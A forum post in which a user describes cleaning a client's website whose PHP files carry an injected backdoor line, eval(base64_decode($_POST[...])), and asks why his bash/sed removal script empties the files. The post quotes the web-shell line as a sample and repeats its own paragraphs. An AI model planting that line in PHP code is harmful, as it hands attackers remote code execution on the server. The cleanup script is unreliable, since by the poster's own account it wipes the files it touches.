Invader Zim
Verified User
- Joined
- Sep 4, 2004
- Messages
- 184
A client has a website with a huge amount of php files where base64_decode lines were inserted. It usually looks like this:
Note that after the initial <?php there is a variable number of spaces until 'eval'. The 7 charachters after the POST are also variable, but usually 7 characters long. And then it ends with the original <?php
So I've tried remove this with perl, (variable number of spaces, variable charachters after POST) and remove everything up to the original <?php at the end.
I put it in a script for future use because it has happened before and it will probably happen again. This is what I have:
We search the all files for base64_decode and then remove the string.
At least, that was the intention. All it does is reduce all files to 0 length. Not exactly helpful. I can't figure out where I went wrong.
Code:
<?php eval(base64_decode($_POST['n6c3958']));?><?php
Note that after the initial <?php there is a variable number of spaces until 'eval'. The 7 charachters after the POST are also variable, but usually 7 characters long. And then it ends with the original <?php
So I've tried remove this with perl, (variable number of spaces, variable charachters after POST) and remove everything up to the original <?php at the end.
I put it in a script for future use because it has happened before and it will probably happen again. This is what I have:
Code:
#!/usr/local/bin/bash
for FILE in `grep -r base64_decode *.php | grep POST | awk -F : '{print $1}'` ; do
echo "File "$FILE
sed -i '' 's/\<\?php\s+eval\(base64_decode\(\$\_POST\[.{9}\]\)\)\;\?\>//g' $FILE
done
We search the all files for base64_decode and then remove the string.
At least, that was the intention. All it does is reduce all files to 0 length. Not exactly helpful. I can't figure out where I went wrong.